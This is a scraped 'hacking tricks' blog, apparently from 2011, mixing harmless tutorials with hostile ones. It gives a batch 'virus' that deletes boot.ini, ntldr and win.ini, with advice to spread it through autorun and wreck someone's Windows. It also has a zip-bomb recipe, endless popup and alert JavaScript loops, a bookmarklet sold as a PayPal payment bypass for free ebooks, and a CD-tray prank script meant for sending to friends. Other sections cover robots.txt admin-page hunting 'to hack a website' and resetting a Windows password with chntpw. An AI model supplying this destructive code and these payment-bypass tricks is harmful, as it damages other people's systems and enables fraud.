Simple Trick To Use Web Browsers As Text Editor

 Web Browsers As Text Editor


In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.

How To Do ?

   1 Copy below code in browser Url Section

 data:text/html, <html contenteditable>

   2. Now Press Enter.
   3. Now you can type anything as would do on any other text editor like Notepad.
   4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)
Category: 4 comments

Password Protect Any Folder Without Any Software

In this tutorial i will show you an interesting and useful trick to password protect a folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7, Win8). Follow below tutorial to learn this trick.

How To Lock Folder ?

 1. Open Notepad and Copy code given below into it.

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== mayanksmansion.tk goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is mayanksmansion.tk)
  • To change the password replace 'mayanksmansion.tk' with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Category: 0 comments

How to compress 1 Gb data to 10 mb

Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.
How effective is it?
Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb to 21 Mb. And same is the case with everything important I wanted to save.
How did I do it?
You are just about to know… Read on.

I used a software named KGB Archiver.
About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1.5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.
Its strength: Very high compression power with very accurate results and no loss of data.
Its weeknss: Due to high compression , the time required to compress and decompress the file is high.

Click Here to Download KGB Archiver for free.
I am sure you loved this post
Enjoy.

Category: 40 comments

Bug In Windows Calculator

Hey! This time I have brought a cool windows bug for you guys.
Its something everyone should know.
This is a Bug in Windows Calculator.

Note:- It works with all versions of Windows.

So without much discussion, let me proceed to the bug.
Have you ever used square root button in windows?
If yes, it is a possibility that you might have come across this bug…. If not, you are just about to know it..
Just follow the steps:-
1) Open calculator ie..  
   Goto run and type – calc 
2) Now type the following
   2.1) Type 4
   2.2) Take its square root  by using the square root button,
   2.3) Now you will get 2. Subtract 2 from it.
   2.4) The answer should have been 0 but its not. You would have got a long number as your answer.

See.. it was as simple.
Here is the general syntax to this bug.
1) Take Any number 
2) Take its square root
3) Subtract its square root from it
4) Your answer is not 0.. That’s the bug.
I am sure this was something new for most of you out here..

Cheers!


Category: 0 comments

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extreme amounts of data. There are more and better ways ones than this one, but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file.

2) Open and type the null character (alt + 255).

3) Press ctrl + a then ctrl + v a couple times to make some null bytes.

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordingly.

6) Open cmd.exe.

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat.

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy friends.
For added fun hex edit the zip and you will see a bunch of hex 5555.

Just add some more and the file will expand amazingly.

Make sure to not open the zip this after.

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Category: 4 comments

How to Test the Working of your Antivirus – EICAR Test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.


1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
                                                        EICAR Test code  :

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 


2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

NOTE: Most antivirus will pop-out a warning message in the Step-1 itself
 
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.
Category: 1 comments

Find Admin Page of a website - The simple method

To hack a website, in most cases,  admin page is important.I will show you a simple trick to find admin pages.
I will use a simple loop hole in robots.txt .


Yes lets start:

First select a website eg:www.google.com
Then add /robots.txt to the website address
Now your Url will be www.google.com/robots.txt
Now you will get a text file showing all the pages which are disallowed by the admin to search engines.
If the site admin is a good Administrator he will not allow admin page to be crawled by search engines.
Now seach for admin you will find the admin page.
See below : 










Category: 0 comments

Batch File Virus (a simple virus for windows)

I assume you know the basics about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file. This post will show you some batch files which can corrupt your Windows OS. You can also say that these batch files can work like a virus. So be careful and do not try it in your computer.
  • Autoexec.bat
  • Ntldr
  • Boot.ini
  • Win.ini
These files are very important and necessary for any Windows operating system. So if you want to corrupt Windows of any person, you have to delete these four files from the computer.
Open notepad and copy the following statements :

@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone uses the disk, autorun will execute itself and command generated by the batch file will corrupt the windows.


Category: 2 comments

Create A Hidden User Account in Windows 7 and xp

  • For your own privacy purposes or say it for security reasons you can Create A Hidden User Account under windows xp/7 operating system. 
  • This tweak will easily allow you an account that is normally displayed on the Welcome screen to be hidden from view. To log on using that hidden account it is necessary to use the Log On To Windows dialog box similar to the one that in Windows 2000.
 1. [Start] [Run] [Regedit]
 
2. Registry Key: HKEY_LOCAL_MACHINE \SOFTWARE\ Microsoft\ WindowsNT\ CurrentVersion\ Winlogon\ SpecialAccounts\ UserList

3. Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.

4. Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden

5. Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

6. Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

Category: 0 comments

Windows 8 Developer Preview

Windows 8 Developer Preview Build 8102 M3 (32 & 64 Bit) ISO

Information:
Review: Microsoft demoed their upcoming Windows 8 OS during the BUILD conference on 4 Oct 2011 along with the sneak peek to developers platform and tools. Windows 8 includes plethora of new features which includes the all new immersive Metro style UI, Internet Explorer 10 (IE10), Task Manager, Quick boot, Face password, Cloud integration etc. They also made available the Windows 8 Developer Preview copy to all the attendees out there along with a Samsung Tablet so that the developer community can play with it and give feedback before the RTM hits store. And for the rest of us the very same files will be uploaded to their public servers and will be available soon.

Features:
The main feature that was shown is the extensively redesigned user interface, optimized for touchscreens as well as mice and keyboards. A new "Start screen", similar to the one in Windows Phone 7, includes live application tiles. It replaces the Start menu, being triggered by the Start button or Windows key, and is also the first screen shown on startup. The user can go to the regular desktop by choosing the "Desktop" tile or a traditional desktop-based application. The Start screen also displays the user's name and avatar. Windows 8 has a new developer platform according to Microsoft Vice President Christopher Ham, who called it "our new developer platform, which is...based on HTML5 and JavaScript. The new applications run in full-screen, but two of them can be displayed side-by-side using "Snap". Examples of new applications that were demoed include a Twitter client, a weather application, a stock-tracking application, an RSS news feeder, and a virtual piano.

The new interface is primarily designed for 16:9 screen resolutions, with 1366×768 and larger screens able to display two Windows 8 applications. 1024×768 screens can display one Windows 8 application in full-screen, and 1024×600 screens can only use the traditional Windows desktop. Mike Angiulo confirmed at Computex 2011 that Windows 8 will use OEM Activation 3.0 instead of OEM Activation 2.1 (used by Windows 7), which supposedly makes it less prone to cracks. Windows 8 features a new lock screen that shows the date and time and notifications, along with a customisable background.
Windows 8 will also include Microsoft's Hyper-V virtualization tool. Previously only offered in Windows Server, Hyper-V will now be available in client versions of Windows for the first time. The system requirements for Hyper-V are a 64-bit processor, a 64-bit version of Windows 8, and a minimum of 4 GB of RAM. Hyper-V also requires a 64-bit system that has Second Level Address Translation (SLAT), a feature that helps with memory management. Many of Intel's and AMD's recent processors support this feature, including many of Intel's i-Series processors (with Extended Page Table) and AMD's 10h family processors. On September 8, 2011, Microsoft announced that Windows 8 has short boot times, because it saves the kernel's memory to the hard disk on shutdown (similar to the existing Hibernate option) and reloads it on startup.
Cofiguration Details: All configuration same as Windows 7 (32 & 64 Bit)
Download Instructions: Click on download link to start download directly from MS own server. Direct download with resumable option.

System Requirements-
Windows Developer Preview works great on the same hardware that powers Windows Vista and Windows 7
1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
16 GB available hard disk space (32-bit) or 20 GB (64-bit)
DirectX 9 graphics device with WDDM 1.0 or higher driver
Taking advantage of touch input requires a screen that supports multi-touch
To run Metro style Apps, you need a screen resolution of 1024 X 768 or greater.

Screenshots:








Download Links:
Download Now (32 Bit) - size 2.8 GB
Download Now (64 Bit) - size 3.6 GB


Category: 1 comments

Javascript Hacks

Here are some most commonly used javascript tricks and they are extremely useful sometimes.

1. Persistent Alert Box

This JavaScript is one of many where the function repeats itself within itself, so it never ends when you click "OK" on the alert box. Just type this in any browser and hit enter, replacing YOUR MESSAGE with the message you want to be displayed.

javascript:function MakWasHere() { alert("YOUR MESSAGE"); MakWasHere(); } MakWasHere();
2. A fluttering of popup windows - Works best in Internet Explorer!

Some versions of Firefox or Chrome will just open new tabs if not configured properly (You can change this setting in their Preferences), and thus making the easiest way to stop the trick by Alt + F4'ing. In IE, (especially versions before IE7), you're running a never-ending loop of popup windows.
Popup blockers will usually not suppress this command since the user is running it directly.
Run this from the address bar, replacing the URL with any URL you want:

javascript:function MakOpenIt() { window.open("http://www.mayanksmansion.tk/");
MakOpenIt();} MakOpenIt();



Enjoy...

Category: 0 comments

GGSIPU counselling status for various courses

The counselling for admission to various courses available in GGSIP University is underway. The seat status of the different courses is available at http://ipu.ac.in/cet2011/conslling/consl2011main.htm
New events and announcements can be viewed at http://ipu.ac.in/newmsg/latestmsg.htm
Good luck to all the aspirants.


Category: 1 comments

Bypass Paypal payment to get free ebooks(paying hacking)

PayPal is the most used Money Transferring System. There has been news in last couple of months that PayPal Accounts are easily getting hacked. But still it is going in the same way and no action is being taken regarding it. Well, have you ever thought that you get some bestselling and costly eBooks free online. I think most of you have not thought the same. But in this post i have brought a Hack that will let you Get Free eBooks on net through PayPal bypassing its Payment Gateway Server. Well i have personally used this trick and it’s a Working Hack. So grab your favorite e-books before the hack is identified by Paypal team. Below is the JavaScript that will bypass the Paypal Gateway server for you.

Just Copy and Paste the below javascript Code at the Url of the Gateway Page:-
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you are visiting a page using a PayPal button, just paste above JavaScript code in the URL bar of your navigator.
If it works, you will be redirected to the download page
Else, try another site (or buy it )
It works with :-
Chrome [yes]
Firefox [yes]
IE 9 [yes] (anyone can test it on IE7 ,8)
Opera [yes]
Safari [yes]

You can try this Script on:- http://www.ptcexpert.com

Category: 1 comments

Download "Harry Potter 7 part 2"

"Harry Potter and the deathly hallows-part2" is the final adventure in the Harry Potter film series. The much anticipated motion picture is the second of two full-length parts.

In the epic finale, the battle between the good and evil forces of the wizarding world escalates into an all-out war. The stakes have never been higher and no one is safe. But it is Harry Potter who may be called upon to make the ultimate sacrifice as he draws closer to the climactic showdown with Lord Voldemort.

It all ends here.


“Harry Potter and the Deathly Hallows – Part 2” stars Daniel Radcliffe, Rupert Grint and Emma Watson, reprising their roles as Harry Potter, Ron Weasley and Hermione Granger. The film’s ensemble cast also includes Helena Bonham Carter, Jim Broadbent, Robbie Coltrane, Warwick Davis, Tom Felton, Ralph Fiennes, Michael Gambon, Ciarán Hinds, John Hurt, Jason Isaacs, Matthew Lewis, Gary Oldman, Alan Rickman, Maggie Smith, David Thewlis, Emma Thompson, Julie Walters and Bonnie Wright.

The film was directed by David Yates, who also helmed the blockbusters “Harry Potter and the Order of the Phoenix,” “Harry Potter and the Half-Blood Prince” and “Harry Potter and the Deathly Hallows – Part 1.” David Heyman, the producer of all of the Harry Potter films, produced the film, together with David Barron. Screenwriter Steve Kloves adapted the screenplay, based on the book by J.K. Rowling. Lionel Wigram is the executive producer.

Behind the scenes, the creative team was led by director of photography Eduardo Serra, production designer Stuart Craig, editor Mark Day, composer Alexandre Desplat, visual effects supervisor Tim Burke, and costume designer Jany Temime.

Warner Bros. Pictures presents a Heyday Films production, “Harry Potter and the Deathly Hallows,” which marks the last installment in the most successful film franchise of all time.

“Harry Potter and the Deathly Hallows – Part 2” has been  released worldwide in theatres and IMAX, in 3D and 2D, on July 15, 2011.”

Crazy Notepad Trick To Continuously Popout CD Tray

Continuously pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them! By seeing the below image I hope you will understand what the below crazy script actually does.


Open Notepad and Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “cdtray.VBS” and send it.


Double Click it if you wanna see it working. Its a very funny Notepad Trick.
Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”


Category: 1 comments

Flip All Your Browser Photos

  1. Open any web page in your browser.
  2. Delete everything in the address bar.
  3. Copy the following javascript and paste it in the address bar:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

NOtice: To stop the effect , just refresh the web page ( press the F5 button on the keyboard)

Category: 0 comments

Download the movie "The Hangover 2"

The Hangover Part II is a 2011 American comedy film and sequel to 2009's The Hangover. The film stars Bradley Cooper, Ed Helms, and Zach Galifianakis. Todd Phillips directed a script written by him, Craig Mazin and Scot Armstrong.
The film was produced by Legendary Pictures and distributed by Warner Bros. Pictures. Production began in October 2010 and the film was released in the United States on May 26, 2011.

Click here to download The Hangover 2.

Enjoy...








Hidden Mozilla Tricks

Type or Copy the given codes in Inverted Commas in the address bar of Firefox.

1.”chrome://browser/content/browser.xul”(without quotes)-It Opens  Firefox inside the existing Firefox window.

2.”chrome://browser/content/preferences/preferences.xul”(without quotes)-It Opens the Options dialog box inside the Firefox.

3.”chrome://browser/content/bookmarks/bookmarksPanel.xul”(without quotes)-It Opens the Book Marks Manager inside the Firefox window.

4.”chrome://browser/content/history/history-panel.xul”(without quotes)-It Opens the History of web inside the Firefox tab.

5.”chrome://mozapps/content/extensions/extensions.xul?type=extensions”(without quotes)-It Opens the Extensions window in the current tab.

6.”chrome://browser/content/preferences/cookies.xul”(without quotes)-It shows the “cookies window” inside the Firefox window.

7.”chrome://browser/content/preferences/sanitize.xul”(without quotes)-It shows the “Clear Private Data” window inside the current tab.

Note: Do not delete the data if you don't want to loose your history or cookies……

8.”chrome://browser/content/aboutDialog.xul”(without quotes)-It Opens the “about firefox” Dialog box inside the window.

9.”chrome://browser/content/credits.xhtml”(without quotes)-IT shows the   list of  the fathers of the firefox(who build the firefox)

10.”chrome://global/content/alerts/alert.xul”-It shows the naughty Firefox.

Enjoy...

Category: 20 comments

How to Dual Boot Windows 7 with XP or Vista


If you are dying to try out Windows 7 but are not ready to give up your installation of XP or Vista, let's take a look at how to dual boot Windows 7 with XP or Vista.

 

Step 0: Download  Windows 7  and Burn It to a DVD

Assuming you've already downloaded a fresh copy of Windows 7, you'll need to burn it to a DVD in order to do a fresh installation. Burn the ISO to a DVD, and move right along to step 1.

Step 1: Partition Your Hard Drive

Before you go installing Windows 7, the first thing you need to do is create a new partition on your hard drive to hold the new installation of Windows. Partitioning your hard drive will vary depending on whether you're running XP or Vista—namely because Vista has a partition tool baked in, XP does not.

Partition Your Hard Drive in XP
To partition your hard drive in Windows XP, you'll need to download some sort of third-party partitioning software. There are a lot of options available, but I prefer to stick with the GParted live CD, a free, open source boot CD that can handle all kinds of partitioning duties.
To use it, just download the GParted Live CD, burn it to a CD, then reboot your computer (booting from the disc). You'll boot right into the partitioning tool.




 Now follow this simple procedure:

  1. Resize your current OS drive to free up enough space for a Windows 7 partition (the minimum system requirements ask for 16GB).
  2. Create a new partition from the newly freed space.
  3. Apply your changes.

Shrink your Vista and create new partition

In your Vista, go to Start -> Control Panel. Click on the System and Maintenance.
Scroll down all the way to find the Administrative Tools. Create on the Create and format hard disk partitions. You should see information about  your current hard drive partitioning.
Right click on the chart diagram and select Shrink volume.


A window will pop up to ask you to enter the amount of space to shrink. This is the size that you want your new partition to have. For Win 7, you will need at least 10GB of hard disk space. Click Shrink after you have confirmed the shrinking size.


Back to the Disk Management window, you should see two partition now: one is the C drive and a new unallocated partition. Right-click on the Unallocated partition and select New Simple Volume

 
Set the volume size of the new partition and click Next.


Next, it will ask you to specify the drive letter of the new partition. To avoid confusion with the drive letter of the CD-ROM, I decided to go with G:. You can set your own drive letter though.


In the next screen, you can specify the file format and Volume label. It is recommended to change the Volume Label to something that is easy to identify, such as Windows 7.


The partitioning will now start. Once it is done, you should see something like this.


Close everything. Place in the Windows 7 DVD and restart the computer.

Step 2: Install Windows 7

Now that you've done all the heavy lifting, it's time for the easy part: Installing Windows 7 on your new partition. So insert your Windows 7 disc and reboot your computer.

Once the DVD boots up it's a simple matter of following along with the fairly simple installation wizard. When you're choosing installation type, be sure to select Custom (advanced) and choose the partition you set up above. (Be careful here. Choosing the wrong partition could mean wiping your other Windows installation altogether, so make sure you pick the new partition you just created. 

After you select the partition, go grab yourself a drink and let the installer do its work. Windows will run through some installation bits, restart a few times in the process. Eventually you'll be prompted to set up your account, enter your license key, and set up Windows. Keep your eyes open for fun new Windows 7 features, like your new homegroup (and the accompanying password). When it's finished, you're up and rolling with your new Windows 7 installation.

Congratulations! You should now have a new entry for Windows 7 on your boot screen when you first start up your computer. You've now got all the tools necessary to dual-boot Windows 7 and XP or Vista—or even to triple-boot Windows 7, Vista, and XP.



This isn't the only way to set up a multi-boot system by any means, but it's how I pulled it off. If you've got a method of your own that you prefer, let's hear it in the comments.

Enjoy...


Category: 52 comments

How to reset Windows admin password without knowing the old password

Here is a simple tutorial on resetting the admin account password of any Windows Operating System.  All you will require for this is one Ubuntu live CD.
  1. Insert Ubuntu Live CD and boot from it.
  2. Open terminal and install chntpw in Ubuntu. To do so use the following commands.
    sudo apt-get update
    sudo apt-get install chntpw
  3. Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
    sudo mkdir /media/WINDOWS
    sudo mount /dev/sda1 /media/WINDOWS
  4. Now navigate to the Windows configuration folder.
    cd /media/WINDOWS/WINDOWS/system32/config/
  5. To reset the administrator password enter
    sudo chntpw SAM
  6. After completing this command you will see 5 different choices. Select the 1st one and press Enter and done.
    
      Enjoy...


Category: 0 comments

Copyright ©

Creative Commons License
http://www.mayanksmansion.tk is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License

Protected by Copyscape Online Plagiarism Test

Copyright © 2011 Mayank Sharma. Powered by Blogger.